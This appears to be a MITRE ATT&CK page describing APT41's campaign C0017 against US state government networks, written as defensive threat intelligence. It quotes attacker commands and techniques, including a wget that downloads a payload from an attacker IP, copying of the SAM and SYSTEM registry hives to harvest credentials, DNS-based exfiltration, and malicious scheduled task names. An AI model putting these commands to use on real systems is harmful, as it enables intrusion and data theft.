Campaign, May 2021 to Feb 2022.View on attack.mitre.org
C0017 was an APT41 campaign conducted between May 2021 and February 2022 that successfully compromised at least six U.S. state government networks through the exploitation of vulnerable Internet facing web applications. During C0017, APT41 was quick to adapt and use publicly-disclosed as well as zero-day vulnerabilities for initial access, and in at least two cases re-compromised victims following remediation efforts. The goals of C0017 are unknown, however APT41 was observed exfiltrating Personal Identifiable Information (PII).
| Technique | Procedure example |
|---|---|
| T1001.003 Protocol or Service Impersonation |
During C0017, APT41 frequently configured the URL endpoints of their stealthy passive backdoor LOWKEY.PASSIVE to masquerade as normal web application traffic on an infected server. |
| T1003.002 Security Account Manager |
During C0017, APT41 copied the `SAM` and `SYSTEM` Registry hives for credential harvesting. |
| T1005 Data from Local System |
During C0017, APT41 collected information related to compromised machines as well as Personal Identifiable Information (PII) from victim networks. |
| T1016 System Network Configuration Discovery |
During C0017, APT41 used `cmd.exe /c ping %userdomain%` for discovery. |
| T1027 Obfuscated Files or Information |
During C0017, APT41 broke malicious binaries, including DEADEYE and KEYPLUG, into multiple sections on disk to evade detection. |
| T1027.002 Software Packing |
During C0017, APT41 used VMProtect to slow the reverse engineering of malicious binaries. |
| T1033 System Owner/User Discovery |
During C0017, APT41 used `whoami` to gather information from victim machines. |
| T1036.004 Masquerade Task or Service |
During C0017, APT41 used `SCHTASKS /Change` to modify legitimate scheduled tasks to run malicious code. |
| T1036.005 Match Legitimate Resource Name or Location |
During C0017, APT41 used file names beginning with USERS, SYSUSER, and SYSLOG for DEADEYE, and changed KEYPLUG file extensions from .vmp to .upx likely to avoid hunting detections. |
| T1041 Exfiltration Over C2 Channel |
During C0017, APT41 used its Cloudflare services C2 channels for data exfiltration. |
| T1048.003 Exfiltration Over Unencrypted Non-C2 Protocol |
During C0017, APT41 exfiltrated victim data via DNS lookups by encoding and prepending it as subdomains to the attacker-controlled domain. |
| T1053.005 Scheduled Task |
During C0017, APT41 used the following Windows scheduled tasks for DEADEYE dropper persistence on US state government networks: `\Microsoft\Windows\PLA\Server Manager Performance Monitor`, `\Microsoft\Windows\Ras\ManagerMobility`, `\Microsoft\Windows\WDI\SrvSetupResults`, and `\Microsoft\Windows\WDI\USOShared`. |
| T1059.003 Windows Command Shell |
During C0017, APT41 used `cmd.exe` to execute reconnaissance commands. |
| T1059.007 JavaScript |
During C0017, APT41 deployed JScript web shells on compromised systems. |
| T1071.001 Web Protocols |
During C0017, APT41 ran `wget http://103.224.80[.]44:8080/kernel` to download malicious payloads. |
Data from MITRE ATT&CK® (Enterprise). ATT&CK® is a registered trademark of The MITRE Corporation.